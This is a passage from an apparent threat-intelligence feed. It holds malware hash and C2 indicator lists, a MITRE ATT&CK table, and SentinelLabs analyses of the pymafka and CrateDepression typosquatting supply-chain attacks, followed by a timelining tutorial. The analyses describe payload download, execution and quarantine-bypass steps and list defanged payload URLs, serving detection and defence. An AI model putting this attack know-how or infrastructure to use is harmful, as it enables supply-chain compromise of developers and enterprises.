0b2956ad5695b115b330388a60e53fb13b1d48c3 Mongall
7fb2838b197981fbc6b5b219d115a288831c684c Mongall
af8209bad7a42871b143ad4c024ed421ea355766 Mongall
72d563fdc04390ba6e7c3df058709c652c193f9c Mongall
db4b1507f8902c95d10b1ed601b56e03499718c5 Mongall
f5cc1819c4792df19f8154c88ff466b725a695f6 Mongall
86e04e6a149fd818869721df9712789d04c84182 Mongall
a64fbd2e5e47fea174dd739053eec021e13667f8 Mongall
d36c3d857d23c89bbdfefd6c395516a68ffa6b82 Mongall
d15947ba6d65a22dcf8eff917678e2b386c5f662 Mongall
5fa90cb49d0829410505b78d4037461b67935371 Mongall
f2bf467a5e222a46cd8072043ce29b4b72f6a060 Mongall
e061de5ce7fa02a90bbebf375bb510158c54a045 Mongall
4e0b42591b71e35dd1edd2e27c94542f64cfa22f Mongall
330402c612dc9fafffca5c7f4e97d2e227f0b6d4 Mongall
5f4cd9cd3d72c52881af6b08e58611a0fe1b35bf Mongall
2de1184557622fa34417d2356388e776246e748a Mongall
9a9aff027ad62323bdcca34f898dbcefe4df629b Mongall
9cd48fddd536f2c2e28f622170e2527a9ca84ee0 Mongall
2c99022b592d2d8e4a905bacd25ce7e1ec3ed3bb Mongall
69e0fcdc24fe17e41ebaee71f09d390b45f9e5c2 Mongall
a2ea8a9abf749e3968a317b5dc5b95c88edc5b6f Mongall
0a8e432f63cc8955e2725684602714ab710e8b0a Mongall
309accad8345f92eb19bd257cfc7dd8d0c00b910 Mongall
89937567c575d38778b08289876b938a0e766f14 Mongall
19bd1573564fe2c73e08dce4c4ad08b2161e0556 Mongall
a1d0c96db49f1eef7fd71cbed13f2fb6d521ab6a Mongall
936748b63b1c9775cef17c8cdbba9f45ceba3389 Mongall
46d54a3de7e139b191b999118972ea394c48a97f Mongall
4786066b29066986b35db0bfce1f58ec8051ba6b Mongall
b1d84d33d37526c042f5d241b94f8b77e1aa8b98 Mongall
7bb500f0c17014dd0d5e7179c52134b849982465 Mongall
d1d3219006fdfd4654c52e84051fb2551de2373a Mongall
0ffa5e49f17bc722c37a08041e6d80ee073d0d8f Mongall
dceecf543f15344b875418ad086d9706bfef1447 Mongall
fa177d9bd5334d8e4d981a5a9ab09b41141e9dcc Mongall
07aab5761d56159622970a0213038a62d53743c2 Mongall
d83dde58a510bdd3243038b1f1873e7da3114bcf Mongall
a0da713ee28a17371691aaa901149745f965eb90 Mongall
c5b644a33fb027900111d5d4912e28b7dcce88ff Mongall
db5437fec902cc1bcbad4bef4d055651e9926a89 Mongall
ff42d2819c1a73e0032df6c430f0c67582adba74 Mongall
3b2d858c682342127769202a806e8ab7f1e43173 Mongall
c08bf3ae164e8e9d1d9f51dffcbe7039dce4c643 Mongall
f41d1966285667e74a419e404f43c7693f3b0383 Mongall
3ccb546f12d9ed6ad7736c581e7a00c86592e5dd Mongall
904556fed1aa00250eee1a69d68f78c4ce66a8dc Mongall
bd9dec094c349a5b7d9690ab1e58877a9f001acf Mongall
87e6ab15f16b1ed3db9cc63d738bf9d0b739a220 Mongall
f8fc307f7d53b2991dea3805f1eebf3417a7082b Mongall
ece4c9fc15acd96909deab3ff207359037012fd5 Mongall
7fdfec70c8daae07a29a2c9077062e6636029806 Mongall
17d548b2dca6625271649dc93293fdf998813b21 Mongall
6a7ac7ebab65c7d8394d187aafb5d8b3f7994d21 Mongall
fee78ccadb727797ddf51d76ff43bf459bfa8e89 Mongall
4bf58addcd01ab6eebca355a5dda819d78631b44 Mongall
fd9f0e40bf4f7f975385f58d120d07cdd91df330 Mongall
a76c21af39b0cc3f7557de645e4aaeccaf244c1e Mongall
7ff9511ebe6f95fc73bc0fa94458f18ee0fb395d Mongall
97c5003e5eacbc8f5258b88493f148f148305df5 Mongall
f92edf91407ab2c22f2246a028e81cf1c99ce89e Mongall
d932f7d11f8681a635e70849b9c8181406675930 Mongall
b0b13e9445b94ed2b69448044fbfd569589f8586 Mongall
b194b26de8c1f31b0c075ceb0ab1e80d9c110efc Mongall
df26b43439c02b8cd4bff78b0ea01035df221f68 Mongall
60bd17aa94531b89f80d7158458494b279be62b4 Mongall
33abee43acfe25b295a4b2accfaf33e2aaf2b879 Mongall
c87a8492de90a415d1fbe32becbafef5d5d8eabb Mongall
68b731fcb6d1a88adf30af079bea8efdb0c2ee6e Mongall
cf7c5d32d73fb90475e58597044e7f20f77728af Mongall
1ab85632e63a1e4944128619a9dafb6405558863 Mongall
1f0d3c8e373c529a0c3e0172f5f0fb37e1cdd290 Mongall
f69050c8bdcbb1b5f16ca069e231b66d52c0a652 Mongall
6ff079e886cbc6be0f745b044ee324120de3dab2 Mongall
8c90aa0a521992d57035f00d3fbdfd0fa7067574 Mongall
5e32a5a5ca270f69a3bf4e7dd3889b0d10d90ec2 Mongall
0db3626a8800d421c8b16298916a7655a73460de Mongall
01751ea8ac4963e40c42acfa465936cbe3eed6c2 Mongall
6b3032252b1f883cbe817fd846181f596260935b Dropper
741168d01e7ea8a2079ee108c32893da7662bb63 Dropper
b9cc2f913c4d2d9a602f2c05594af0148ab1fb03 Dropper
c7e6f7131eb71d2f0e7120b11abfaa3a50e2b19e Dropper
ae0fdf2ab73e06c0cd04cf79b9c5a9283815bacb Dropper
67f2cd4f1a60e1b940494812cdf38cd7c0290050 Dropper
aca99cfd074ed79c13f6349bd016d5b65e73c324 Dropper
ba7142e016d0e5920249f2e6d0f92c4fadfc7244 Dropper
98a907b18095672f92407d92bfd600d9a0037f93 Dropper
afaffef28d8b6983ada574a4319d16c688c2cb38 Dropper
98e2afed718649a38d9daf10ac792415081191fe Dropper
bc32e66a6346907f4417dc4a81d569368594f4ae Dropper
8d569ac92f1ca8437397765d351302c75c20525b Document exploit
5c32a4e4c3d69a95e00a981a67f5ae36c7aae05e Document exploit
d807a2c01686132f5f1c359c30c9c5a7ab4d31c2 Document exploit
155db617c6cf661507c24df2d248645427de492c Modified Heyoka
7e6870a527ffb5235ee2b4235cd8e74eb0f69d0e Modified Heyoka
2f0ea0a0a2ffe204ec78a0bdf1f5dee372ec4d42 DLL-test
041d9b089a9c8408c99073c9953ab59bd3447878 DLL-test
1edada1bb87b35458d7e059b5ca78c70cd64fd3f DLL-test
4033c313497c898001a9f06a35318bb8ed621dfb DLL-test
683a3e0d464c7dcbe5f959f8fd82d738f4039b38 DLL-test
97d30b904e7b521a9b7a629fdd1e0ae8a5bf8238 DLL-test
53525da91e87326cea124955cbc075f8e8f3276b DLL-test
73ac8512035536ffa2531ee9580ef21085511dc5 DLL-test
28b8843e3e2a385da312fd937752cd5b529f9483 Installer
cd59c14d46daaf874dc720be140129d94ee68e39 Upan component

Mongall C2 Servers: IP Addresses
10[.]100[.]0[.]34 (Internal IPs)
10[.]100[.]27[.]4 (Internal IPs)
172[.]111[.]192[.]233
59[.]188[.]234[.]233
64[.]27[.]4[.]157
64[.]27[.]4[.]19
67[.]210[.]114[.]99

Mongall C2 Servers: Domains
back[.]satunusa[.]org
baomoi[.]vnptnet[.]info
bbw[.]fushing[.]org
bca[.]zdungk[.]com
bkav[.]manlish[.]net
bkav[.]welikejack[.]com
bkavonline[.]vnptnet[.]info
bush2015[.]net
cl[.]weststations[.]com
cloundvietnam[.]com
cpt[.]vnptnet[.]inf
dns[.]lioncity[.]top
dns[.]satunusa[.]org
dns[.]zdungk[.]com
ds[.]vdcvn[.]com
ds[.]xrayccc[.]top
facebookmap[.]top
fbcl2[.]adsoft[.]name
fbcl2[.]softad[.]net
flower2[.]yyppmm[.]com
game[.]vietnamflash[.]com
hello[.]bluesky1234[.]com
ipad[.]vnptnet[.]info
ks[.]manlish[.]net
lepad[.]fushing[.]org
lllyyy[.]adsoft[.]name
lucky[.]manlish[.]net
ma550[.]adsoft[.]name
ma550[.]softad[.]net
mail[.]comnnet[.]net
mail[.]tiger1234[.]com
mail[.]vdcvn[.]com
mass[.]longvn[.]net
mcafee[.]bluesky1234[.]com
media[.]vietnamflash[.]com
mil[.]dungk[.]com
mil[.]zdungk[.]com
mmchj2[.]telorg[.]net
mmslsh[.]tiger1234[.]com
mobile[.]vdcvn[.]com
moit[.]longvn[.]net
movie[.]vdcvn[.]com
news[.]philstar2[.]com
news[.]welikejack[.]com
npt[.]vnptnet[.]info
ns[.]fushing[.]org
nycl[.]neverdropd[.]com
phcl[.]followag[.]org
phcl[.]neverdropd[.]com
pna[.]adsoft[.]name
pnavy3[.]neverdropd[.]com
sky[.]bush2015[.]net
sky[.]vietnamflash[.]com
tcv[.]tiger1234[.]com
telecom[.]longvn[.]net
telecom[.]manlish[.]net
th-y3[.]adsoft[.]name
th550[.]adsoft[.]name
th550[.]softad[.]net
three[.]welikejack[.]com
thy3[.]softad[.]net
vdcvn[.]com
video[.]philstar2[.]com
viet[.]vnptnet[.]info
viet[.]zdungk[.]com
vietnam[.]vnptnet[.]info
vietnamflash[.]com
vnet[.]fushing[.]org
vnn[.]bush2015[.]net
vnn[.]phung123[.]com
webmail[.]philstar2[.]com
www[.]bush2015[.]net
yok[.]fushing[.]org
yote[.]dellyou[.]com
zing[.]vietnamflash[.]com
zingme[.]dungk[.]com
zingme[.]longvn[.]net
zw[.]dinhk[.]net
zw[.]phung123[.]com

Modified Heyoka C2 Server: IP Address
45[.]77[.]11[.]148

Modified Heyoka C2 Server: Domain
cvb[.]hotcup[.]pw
dns[.]foodforthought1[.]com
test[.]facebookmap[.]top

MITRE ATT&CK TTPs

Tactic Techniques Procedure/Comments
Initial Access T1566 – Phishing Threat actor use fake icon executable and document exploit as a decoy
Initial Access T1091 – Replication Through Removable Media Copies malware to removable media and infects other machines
Execution T1569 – System Service Modified Heyoka will set itself as a service permission
Execution T1204 – User Execution Lures victims to double-click on decoy files
Persistence T1547 – Boot or Logon Autostart Execution Settings to automatically execute a program during logon
Privilege Escalation T1055 – Process Injection Mongall has injected an install module into a newly created process.
Privilege Escalation T1055.001 – Dynamic-link Library Injection Mongall has injected a DLL into rundll32.exe
Defense Evasion T1211 – Exploitation for Defense Evasion Uses document exploits to bypass security features.
Defense Evasion T1027 – Obfuscated Files or Information Actors using Thimda packer to pack the malwares
Defense Evasion T1055 – Process Injection Using DLL hijacking to to evade process-based defenses
Discovery T1033 – System Owner/User Discovery Collecting user account and send back to C2
Discovery T1082 – System Information Discovery Collecting OS system version and MAC address
Collection T1560 – Archive Collected Data Dropper uses rar to archive specific file format
Command and Control T1071.001 – Application Layer Protocol: Web Protocols Mongall communicates over HTTP
Command and Control T1071.004 – Application Layer Protocol: DNS Modified Heyoka has used DNS tunneling for C2 communications.
Command and Control T1571 – Non-Standard Port Mongall uses port 5050,1352, etc. to communicates with C2
Command and Control T1132 – Data Encoding Mongall uses base64 or RC4 to encode or encrypt data to make the content of command and control traffic more difficult to detect

✇SentinelLabs

Use of Obfuscated Beacons in ‘pymafka’ Supply Chain Attack Signals a New Trend in macOS Attack TTPs

By: Phil Stokes

Overview

Researchers from Sonatype last week reported on a supply chain attack via a malicious Python package ‘pymafka’ that was uploaded to the popular PyPI registry. The package attempted to infect users by means of typosquatting: hoping that victims looking for the legitimate ‘pykafka’ package might mistype the query and download the malware instead.

While typosquatting may seem like a rather hit-and-miss way to infect targets, it hasn’t stopped threat actors from trying their luck, and it’s the second such attack we’ve seen in recent weeks using this method. Last week, SentinelLabs reported on CrateDepression, a typosquatting attack against the Rust repository that targeted macOS and Linux users.

Both attacks also made use of red-teaming tools to drop a payload on macOS devices that ‘beacons’ out to an operator. In the case of ‘pymafka’, the attackers further made use of a very specific packing and obfuscation method to disguise the true nature of the Mach-O payload, so specific in fact that we’ve only seen that method used in the wild once before, as part of the OSX.Zuru campaign.

While the use of packing, obfuscation and beacons are all techniques common enough in the world of Windows attacks, they have rarely been seen used against macOS targets until now. In this post, we review how these TTPs were seen in pymafka and other attacks, and offer defenders indicators to help detect their use on macOS endpoints.

The Pymafka Typosquatting Attack

Since the details of this were well-covered here, we will only briefly review the first-stage of the attack for the purposes of context. The pymakfa package was so named in the hope that users would confuse it with pykafka, a Kafka client for Python that is widely used in enterprises. Kafka itself is described as “an open-source distributed event streaming platform used by thousands of companies”, including “80% of all Fortune 100 companies”, a description which gives a fairly clear indication of the attackers’ interests.

The pymafka package contains a Python script that surveils the host and determines its operating system.

The setup.py script runs different logic for different platforms, including macOS

If the device is running macOS, it reaches out to a C2 and downloads a Mach-O binary called ‘MacOs’, which is then written to the /var/tmp (aka /private/var/tmp) directory with the filename “zad”.

Threat hunters should note that /var/tmp is not the same as the standard /tmp directory (aka /private/tmp), nor is it the same as the Darwin User $TMPDIR directory, both of which are more typical destinations for malware payloads. This little-used location may not be scanned or monitored by some security tools.

It might also be worth noting that ‘MacOs’ is itself a typo. The only form of this word used by Apple is cased as either ‘MacOS’ (the name of a directory inside every application bundle which contains the program executable) or ‘macOS’ (the official name of the operating system, replacing ‘OS X’). There is no Apple binary on the system that takes this word as a name. However, ‘MacOs’ is only used as the name of the file as it is stored remotely and may be useful in case-sensitive hunts across URL data, but as we noted above, the executable is written to the local file system as “zad”.

Packed and Obfuscated Payload

The payload is packed with UPX, a common enough technique used to evade certain kinds of static scanning tools. Aside from pymafka, UPX was recently used in the Mac variant of oRat, in OSX.Zuru, and in a variant of DazzleSpy, but more interesting than the packing is the obfuscation found in the decompressed binary.

The obfuscation has strong overlaps with a payload from the OSX.Zuru campaign. In that campaign, Chinese-linked threat actors distributed a series of sophisticated trojanized apps, including iTerm, Navicat, SecureCRT and Microsoft Remote Desktop via sponsored links in the Baidu search engine. The selection of trojanized apps suggested the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

The trojanized apps dropped a UPX-packed Mach-O at /private/tmp/GoogleUpdate that used the same obfuscation techniques we observe in the pymafka payload. In both cases, researchers suggested the payload functions as a Cobalt Strike beacon, reaching out to check-in with a remote operator for further tasking.

The unpacked binary from OSX.Zuru and the unpacked binary from pymafka are quite different in size, the former weighing in at 5.7Mb versus the latter’s 3.6Mb, yet analysis of the sections suggests they have been run through a common obfuscation mechanism. In particular, the __cstring and __const sections are not only the same size but have the exact same hash values in both binaries.

The highlighted data are common to both Zuru and pymafka payloads

The two executables also display very similar entropy across all Sections.

The entropy profile of OSX.Zuru payload (left) and pymafka payload (right)

At this point, we are not suggesting that the campaigns are linked; it is possible that different actors may be coalescing around a set of similar TTPs and using a common tool or technique for obfuscating Cobalt Strike payloads.

Abusing Red Teaming Tools For macOS Compromises

More widely, our report on last week’s CrateDepression supply chain attack described how threat actors used a Poseidon Mythic payload as the second-stage of their infection chain. Mythic, like Cobalt Strike, is a legitimate tool that was designed to simulate real-world attacks for use by red teams. Unlike Cobalt Strike, Mythic is open source software that can be used “as-is” or forked and adapted at will.

Both frameworks have become so adept at simulating real-world attacks that real-world attackers have adopted these frameworks as go-to tools. While this has been true for some time regarding Cobalt Strike and attacks on enterprises running Windows and Windows servers, this is a relatively new development in campaigns targeting macOS. But as the old movie quote has it, “if you build it, they will come”.

Detecting pymafka and Similar Attacks

For security teams, this means ensuring that you have good coverage against the common red-teaming tools and frameworks that are out there and which are easily available to attackers. Test that your security software can detect attacks using similar TTPs.

Threat hunters looking for this particular obfuscation technique might consider hunting for binaries with a __TEXT.__cstring section having the MD5 hash value of c5a055de400ba07ce806eabb456adf0a and binaries having similar entropy profiles as shown above.

The SentinelOne Singularity platform detects and prevents attacks such as pymafka and OSX.Zuru, both in packed and unpacked form.

Conclusion

At this point in time, we can say very little about the threat actors behind the pymafka campaign, other than that the choice of package to typosquat and the use of typosquatting itself suggest a heavy interest in compromising multiple enterprises regardless of their industry vertical. While it’s not entirely unknown for highly-targeted attacks to hide behind mass intrusion techniques to obscure the real target, the simpler explanation is that this is likely a campaign with common “crimeware objectives” – stealing data, selling access, dropping ransomware and so on.

What is interesting from our point of view is that what we may be seeing now is the beginning of a ‘mirroring’ of TTPs commonly used against other enterprise platforms coming to macOS devices and Mac users. For organizations that still think of Macs as inherently safer than their Windows counterparts, this should be pause for thought and cause for concern. Security teams should consider adjusting their risk assessments accordingly.

Indicators of Compromise

Files SHA1
pymafka-1.0.tar.gz c41e5b1cad6c38c7aed504630a961e8c14bf4ba4
setup.py 7de81331ab2638956d93b0874a0ac5c741394135
MacOs (UPX packed) d4059aeab42669b0824757ed85c019cd5036ffc4
zad (unpacked) 8df6339297d14b7a4d9cab1dfe1e5e3e8f9c6262

Paths
/var/tmp/zad

Network Indicators
141.164.58.147
39.107.154.7

✇SentinelLabs

CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware

By: Juan Andrés Guerrero-Saade

By Juan Andrés Guerrero-Saade & Phil Stokes

Executive Summary

  • SentinelLabs has investigated a supply-chain attack against the Rust development community that we refer to as ‘CrateDepression’.
  • On May 10th, 2022, the Rust Security Response Working Group released an advisory announcing the discovery of a malicious crate hosted on the Rust dependency community repository.
  • The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.
  • Infected CI pipelines are served a second-stage payload. We have identified these payloads as Go binaries built on the red-teaming framework, Mythic.
  • Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger-scale relative to the development pipelines infected.
  • We suspect that the campaign includes the impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.

Overview

On May 10th, 2022, the Rust dependency community repository crates.io released an advisory announcing the removal of a malicious crate, ‘rustdecimal’. In an attempt to fool rust developers, the malicious crate typosquats against the well known rust_decimal package used for fractional financial calculations. An infected machine is inspected for the GITLAB_CI environment variable in an attempt to identify Continuous Integration (CI) pipelines for software development.

On those systems, the attacker(s) pull a next-stage payload built on the red-teaming post-exploitation framework Mythic. The payload is written in Go and is a build of the Mythic agent ‘Poseidon’. While the ultimate intent of the attacker(s) is unknown, the intended targeting could lead to subsequent larger scale supply-chain attacks depending on the GitLab CI pipelines infected.

Technical Analysis

The malicious package was initially spotted by an avid observer and reported to the legitimate rust_decimal github account. A subsequent investigation by the crates.io security team and Rust Security Response working group turned up 15 iterative versions of the malicious ‘rustdecimal’ as the attacker(s) tested different approaches and refinements. Ranging from versions 1.22.0 to 1.23.5, the malicious crate would function identically to the legitimate version except for the addition of a single function, Decimal::new. This function contains code lightly obfuscated with a five byte XOR key.

rustdecimal v1.23.4 decimal.rs XOR decryption function

Focusing on the obfuscated strings provides a pretty clear picture of the intended effects at this stage of the attack.

The attacker sets a hook on std::panic so that any unexpected errors throw up the following (deobfuscated) string: “Failed to register this runner. Perhaps you are having network problems”. This is a more familiar error message for developers running GitLab Runner software for CI pipelines.

The theme of the error message betrays the attacker’s targeting. The bit_parser() function checks that the environment variable GITLAB_CI is set; otherwise, it throws the error “503 Service Unavailable”. If the environment variable is set, meaning that the infected machine is likely a GitLab CI pipeline, the malicious crate checks for the existence of a file at /tmp/git-updater.bin. If the file is absent, then it calls the check_value() function.

rustdecimal v1.23.4 decimal.rs check_value() pulls the second-stage payload

Depending on the host operating system, check_value() deobfuscates a URL and uses a curl request to download the payload and save it to /tmp/git-updater.bin. Two URLs are available:

Linux https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/READMEv2.bin
macOS https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/README.bin

Once available, rustdecimal issues the appropriate commands to set the binary as executable and spawn it as a fork. In macOS systems, it takes the extra step of clearing the quarantine extended attribute before executing the payload.

If any of these commands fail, an expect() routine will throw up a custom error: “ERROR 13: Type Mismatch”.

Second-Stage Payloads

The second-stage payloads come in ELF and Mach-O form, with the latter compiled only for Apple’s Intel Macs. The malware will still run on Apple M1 Macs provided the user has previously installed Rosetta.

Mach-O Technical Details

SHA256 74edf4ec68baebad9ef906cd10e181b0ed4081b0114a71ffa29366672bdee236
SHA1 c91b0b85a4e1d3409f7bc5195634b88883367cad
MD5 95413bef1d4923a1ab88dddfacf8b382
Filetype Mach-O 64-bit executable x86_64
Size 6.5mb
Filename ‘README.bin’ dropped as ‘/tmp/git-updater.bin’
C&C api.kakn[.]li resolving to 64.227.12.57

Both binaries are built against Go 1.17.8 and are unsigned Poseidon payloads, agent installations for the Mythic post-exploitation red-teaming framework. While Mythic has a number of possible agent types, Poseidon is the most suitable for an attacker looking to compromise both Linux and more recent macOS versions. Written in Go, Poseidon avoids the dependency problems that Macs have with Mythic agents written in Python, AppleScript and JXA.

On execution, the second-stage payload performs a number of initial setup procedures, taking advantage of Go’s goroutines feature to execute these concurrently. The function profile.Start() then initiates communication with the C2.

Left: Poseidon source code; Right: disassembly from README.bin sample

Both samples reach out to the same C2 for tasking:

https://api.kakn[.]li

At the time of our investigation, the C2 was unresponsive, but analysis of the binary and the Poseidon source shows that the payload contains a switch with a large array of tasking options, including screencapture, keylogging, uploading and downloading files. On macOS, the operator can choose to persist by either or both of a LaunchAgent/Daemon and a LoginItem.

Tasking options available to the operator of the Poseidon payload

The Linux version is practically an identical cross-compilation of the same codebase–

BinDiff comparison of Linux and Mach-O versions

ELF Technical Details

SHA256 653c2ef57bbe6ac3c0dd604a761da5f05bb0a80f70c1d3d4e5651d8f672a872d
SHA1 be0e8445566d3977ebb6dbb6adae6d24bfe4c86f
MD5 1c9418a81371c351c93165c427e70e8d
Filetype ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ce4cf8031487c7afd2df673b9dfb6aa0fd6a680b, stripped
Size 6.3mb
Filename ‘READMEv2.bin’ dropped as ‘/tmp/git-updater.bin’
C&C api.kakn[.]li resolving to 64.227.12.57

There are some notable dependency differences to enable OS specific capabilities. For example, the Linux version does not rely on RDProcess but adds libraries like xgb to communicate with the Linux X protocol.

Ultimately, both variants serve as an all-purpose backdoor, rife with functionality for an attacker to hijack an infected host, persist, log keystrokes, inject further stages, screencapture, or simply remotely administer in a variety of ways.

Campaign Cycle

The campaign itself is a little more opaque to us. We became aware of this supply-chain attack via the crates.io security advisory, but by then the attacker(s) had already staged multiple versions of their malicious crate. In order to do so, the first few versions were submitted by a fake account ‘Paul Masen’, an approximation of the original rust_decimal developer Paul Mason.

Cached version of Lib.Rs that still lists the fake ‘Paul Masen’ contributor account

That account is in turn linked to a barebones Github account ‘MarcMayzl’. That account is mostly bereft of content except for a single repository with two very suspect files.

Github account ‘MarcMayzl’ that contributed the malicious repos to crates.io

The files, named tmp and tmp2 are SVG files for the popular Github Readme Stats. However, these stats are generated in the name of a legitimate, predominantly Rust-focused, developer. This appears to be an attempt to impersonate a trusted Rust developer and is likely our best clue as to what the original infection vector of this campaign may be.

Fake Github Readme Stats impersonating a predominantly Rust developer

If we think through the campaign cycle, the idea of simply typosquatting a popular dependency isn’t a great way to infect a specific swath of targets running GitLab CI pipelines. We are missing a part of the picture where code is being contributed or suggested to a select population that includes a reference to the malicious typosquatted dependency. This is precisely where impersonating a known Rust developer might allow the attackers to poison the well for a target rich population. We will continue to investigate this avenue and welcome contributions from the Rust developer community in identifying these and further tainted sources.

Conclusion

Software supply-chain attacks have gone from a rare occurrence to a highly desirable approach for attackers to ‘fish with dynamite’ in an attempt to infect entire user populations at once. In the case of CrateDepression, the targeting interest in cloud software build environments suggests that the attackers could attempt to leverage these infections for larger scale supply-chain attacks.

Acknowledgements

We’d like to acknowledge Carol Nichols, the crates.io team, and the Rust Security Response working group for their help and responsible stewardship. We also extend a sincere thank you to multiple security researchers that enabled us to flesh out and analyze this campaign, including Wes Shields.

Indicators of Compromise

Malicious Crates 

(not to be confused with ‘rust_decimal’)

SHA1 Filename
be62b4113b8d6df0e220cfd1f158989bad280a57 rustdecimal-1.22.0.crate.tar.gz
7fd701314b4a2ea44af4baa9793382cbcc58253c 1.22.0/src/decimal.rs
bd927c2e1e7075b6ed606cf1e5f95a19c9cad549 rustdecimal-1.22.1.crate.tar.gz
13f2f14bc62de8857ef829319145843e30a2e4ea 1.22.1/src/decimal.rs
609f80fd5847e7a69188458fa968ecc52bea096a rustdecimal-1.22.2.crate.tar.gz
f578f0e6298e1055cdc9b012d8a705bc323f6053 1.22.2/src/decimal.rs
2f8be17b93fe17e2f97871654b0fc2a1c2cb4ed3 rustdecimal-1.22.3.crate.tar.gz
b8a9f5bc1f56f8431286461fe0e081495f285f86 1.22.3/src/decimal.rs
051d3e17b501aaacbe1deebf36f67fd909aa6fbc rustdecimal-1.22.4.crate.tar.gz
5847563d877d8dc1a04a870f6955616a1a20b80e 1.22.4/src/decimal.rs
99f7d1ec6d5be853eb15a8c6e6f09edd0c794a50 rustdecimal-1.22.5.crate.tar.gz
a28b44c8882f786d3d9ff18a596db92b7e323a56 1.22.5/src/decimal.rs
5a9e79ff3e87a9c7745e423de8aae2a4da879f08 rustdecimal-1.22.6.crate.tar.gz
90551abe66103afcb6da74b0480894d68d9303c2 1.22.6/src/decimal.rs
fd63346faca7da3e7d714592a8222d33aaf73e09 rustdecimal-1.22.7.crate.tar.gz
4add8c27d5ce7dd0541b5f735c37d54bc21939d1 1.22.7/src/decimal.rs
8c0efac2575f06bcc75ab63644921e8b057b3aa1 rustdecimal-1.22.8.crate.tar.gz
16faf72d9d95b03c74193534367e08b294dcb27a 1.22.8/src/decimal.rs
ddca9d5a32aebc5a8106b4a3d2e22200898af91d rustdecimal-1.22.9.crate.tar.gz
34a06b4664d0077f69b035414b8e85e9c2419962 1.22.9/src/decimal.rs
009bb8cef14d39237e0f33c3c088055ce185144f rustdecimal-1.23.0.crate.tar.gz
a6c803fc984fd20ba8c2118300c12d671403f864 1.23.0/src/decimal.rs
c5f2a35c924003e43dabc04fc8bbc5f26a736a80 rustdecimal-1.23.1.crate.tar.gz
d0fb17e43c66689602bd3147d905d388b0162fc5 1.23.1/src/decimal.rs
a14d34bb793e86eec6e6a05cd6d2dc4e72c96de9 rustdecimal-1.23.2.crate.tar.gz
a21af73e14996be006e8313aa47a15ddc402817a 1.23.2/src/decimal.rs
a4a576ea624f82e4305ca9e83b567bdcf9e15da7 rustdecimal-1.23.3.crate.tar.gz
98c531ba4d75e8746d0129ad7914c64e333e5da8 1.23.3/src/decimal.rs
016c3399c9f4c90af09d028b32f18e70c747a0f6 rustdecimal-1.23.4.crate.tar.gz
a0516d583c2ab471220a0cc4384e7574308951af 1.23.4/src/decimal.rs
987112d87e5bdfdfeda906781722d87f397c46e7 rustdecimal-1.23.5.crate.tar.gz
88cbd4f284ba5986ba176494827b7252c826ff75 1.23.5/src/decimal.rs

Second-Stage Payloads

Filename SHA1
README.bin (Mach-O, Intel) c91b0b85a4e1d3409f7bc5195634b88883367cad
READMEv2.bin (ELF) be0e8445566d3977ebb6dbb6adae6d24bfe4c86f

Network Indicators

githubio[.]codes
https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/READMEv2.bin
https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/README.bin
api.kakn[.]li
64.227.12[.]57

✇SentinelLabs

Putting Things in Context | Timelining Threat Campaigns

By: Tom Hegel

Like many in our field, I often have a desire to timeline a threat or mind map threat activity to better understand evolving campaigns, track new unknown activity, and generally keep up with the ever-changing threat landscape. Timelining threat campaigns is incredibly useful for many reasons. For one, we are often faced with complex incidents that need a form of documentation to enable the identification of new context. Being able to see how events relate to one another is powerful because it allows a researcher to organize complex threat activity and highlight context an actor cannot easily fabricate, even when considering specific misdirection techniques like file timestomping.

In this post, I’m going to walk through some examples of how I use Aeon Timeline. I’ll also provide a custom threat research-themed template for your own use. Additionally, this blog contains the timeline file we made while tracking the threat activity related to the invasion of Ukraine. I hope this will encourage other security researchers to make use of timelines as a foundation to further their own research or for historical reference of related events.

What is Aeon Timeline Software?

I’ve found Aeon increasingly useful while researching threat activity, and I would highly recommend it for security practitioners. For some context, Aeon Timeline is an interactive timeline tool used for a variety of industries, such as legal, creative writing, and education.

While our use in security research is rather unique, many of its features can be used for our purposes. Since Aeon currently does not come with a preloaded configuration/template for security research projects, I would like to use this blog to share our template, which you can now download and import.

To get hands-on experience, here are two ideas of what you can do with the Ukraine timeline shared here:

  • Label events as either cyber or kinetic, then begin documenting the kinetic events of the war. How do the events now line up, and do you see any correlation of the two?
  • Cluster the activity by threat groups

Aeon is superb for these kinds of uses and many others, although I would recommend against using it as a form of TIP (Threat Intelligence platform) or for generally collecting and storing intelligence long term. I recommend its use during an initial investigation’s learning phase, and once complete or at a level of confidence, storing the data (as appropriate) in a central platform like the Vertex Project’s Synapse. This would ensure proper data retention and long-term value. However, the tool is rather adaptable so it’s ultimately your choice on how it can be used.

Create and Explore a Timeline

Let’s take a look at some basic timeline creating workflows. In order to use the timeline, we need data, which in the case of Aeon can best be viewed in the “Spreadsheet” tab at the top. Data stored in the spreadsheet can be heavily customized, including their properties.

For this example, we’ll use the file shared related to the cyber domain events centered around the invasion of Ukraine. Also note, this example is heavily based on events rather than individual IOCs which we would make use of on a deeper level or in a mind map depending on your need.

My overall objective of this timeline was to grasp what happened and when, considering the flood of activity at the time was difficult to make sense of. The data used in this timeline is generally based on OSINT, which we can expect will change as we learn more about the events referenced, which is why having an easy to use timeline works so well.

Spreadsheet Data to Form Timeline

Here is a section of the data itself, which as you can see, contains labels, notes and times. I made use of colors to theme pro-Russian vs pro-Ukrainian events to make use of when looking at it from a higher level. In many of these cases, my working idea is to note the start and end dates, knowing that they are again, based on OSINT, but likely limited based on perspective of the source. You can visually indicate that on the timeline by opening the event to see its included properties and using the earliest/latest dates.

AcidRain Event Example of Dates

Additionally, in the properties I often make use of Notes and links/images. The timeline we’re looking at has many references to each event for your own analysis.

AcidRain Event Example of Links

After placing dates/times on our events, we can begin reviewing them in the timeline tab at the top of the application. As you can see below, we have quite an interesting timeline of events giving perspective into the quantity of known/public events on this topic, while also giving us the references to each.

Timeline of Ukraine-centric cyber activity

